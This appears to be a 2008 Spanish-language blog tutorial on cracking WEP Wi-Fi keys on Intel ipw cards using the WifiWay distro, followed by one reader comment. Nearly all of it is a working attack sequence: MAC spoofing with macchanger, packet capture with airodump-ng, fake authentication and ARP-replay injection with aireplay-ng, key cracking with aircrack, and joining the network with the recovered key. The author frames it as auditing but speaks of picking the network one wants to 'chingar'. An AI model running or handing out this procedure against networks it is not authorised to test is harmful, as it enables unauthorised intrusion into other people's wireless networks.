30/4/08

Crackear (Auditar) claves WEP

Primero que nada quiero aclarar que este pequeño documento les sirve a las personas que tienen las tarjetas ipw3945, ipw2915, ipw2200. Ya que yo tengo una de esas tarjetas y hace tiempo leei un documento que decía lo siguiente .

############
pw2915 uses ipw2200 driver (See this thread
ipw3945 for alpha injection support.) For ipw3945 you
can use the ipwraw-ng driver or see Live
Distros for WifiWay which includes patches for
injection.
#############

Ha si que por esa razón utilice ipwraw-ng para mi debían, pero me es mas sencillo utilizar el wifiway,
hasi que lo explicare utilizando wifiway, ya que viene muy bien soportada mi tarjeta ipw3945.

Lo primero es descargar la distro wifiway, y echarla andar, una ves tengamos jalando lo primero que haremos sera ver que AP astan jalando.

#airodump-ng rtap0

De esta manera veremos que AP están funcionando mejor y en que canal están viajando (chanel), también veremos el BSSID del AP. Después de ver cual es AP que mas nos conviene o de ver cual es el que queremos chingar, tomamos nota del canal (chanel, ch) y del BSSID del módem.
Ahora bien lo primero que aremos sera cambiar la MAC.

#macchanger -m [fakemac] [interface_wifi]
esto seria
#macchanger -m 00:22:33:11:44:66

Después entramos a los archivos bssid y chanel que se encuentran en /sys/class/net/wifi0/device y los editamos.

#nano chanel
Aquí ponemos el ch del AP a auditar, es decir el canal, por lo general son del 1 al 11, con los que mayormente me encontrado son el 1, 6 y el 11

#nano bssid
En este archivo ponemos el BSSID del AP o módem a auditar.

Despues de guardar ambos archivos, empezamos lo interesante. A CAPTURAR.

#airodump-ng -c [chanel] -w [ruta_y_nombre_del_archivo_de_captura] rtap0
esto seria.
#airodump-ng -c 1 -w /home/usuario/captura rtap0

Lo dejamos jalando y en el mismo directorio anterior editamos el archivo rate

#nano rate
aquí le damos el rango de 2, por lo general viene 108 se lo cambiamos y guardamos.

Este paso es si queremos, yo siempre lo hago, el cual es levantar la interfase.

#ifconfig [interfaz] up
seria
#ifconfig wlan0 up ----> en mi caso recordemos que las interfaces varían.

Ahora hay que asociar la tarjeta con el AP.

#aireplay-ng -1 0 -a [BSSID] -h [FAKEMAC] -e [ESSID_AP] [INTERFAZ]
esto seria.
#aireplay -ng -1 0 -a 29:D9:72:4D:15:55 -h 00:22:33:11:44:66 -e INFINITUM445 wifi0

#####este paso lo podemos repetir varias veces hasta asociarnos######

Después de la asociación hacemos.

#aireplay-ng -3 -b [BSSID] -h [FAKEMAC] [INTERFAZ]
esto seria.
#aireplay-ng -3 -b 29:D9:72:4D:15:55 -h 00:22:33:11:44:66 wifi0

En este punto esperamos asta tener bastantes IVs o datos capturados, varia siempre hay veces que tumbas la clave con pocos datos capturados y hay veces que necesitas de amadre, ha si que podemos hacer el siguiente paso varias veces hasta que nos la encuentre.

#aircrack-pwt ARCHIVO_DE_CAPTURA.cap
es decir
#aircrack-pwt /home/usuario/captura.cap
o bien
#cd /home/usuario
aircrack-pwt captura.cap

Si todo sale bien solamente hay que esperar a que aircrack decifre la clave y listo. Nos podemos conectar ha si.

#iwconfig [interfaz] essid [nombre_del_ap] mode managed key [CLAVE_WEP] && dhclient [interfaz]
esto seria.

#iwconfig wifi0 essid INFINITUM445 mode managed key 1029384756 && dhclient wifi0

Nota: Hay que revisar el RXQ para la captura sino tendremos que acercarnos mas al AP.
Nota2: Si no encuentras el archivo donde editas el BSSID, el CHANEL y el RATE puedes hacer un “find” para saber donde están.

#find / -name bssid
#find / -name chanel
#find / -name rate

Deberán estar en la misma carpeta. =)

1 comentario:

Linuxman dijo...

Y las fotos del flisol compañero ??? o no tomaste fotos?..

Buen tuto ehhh,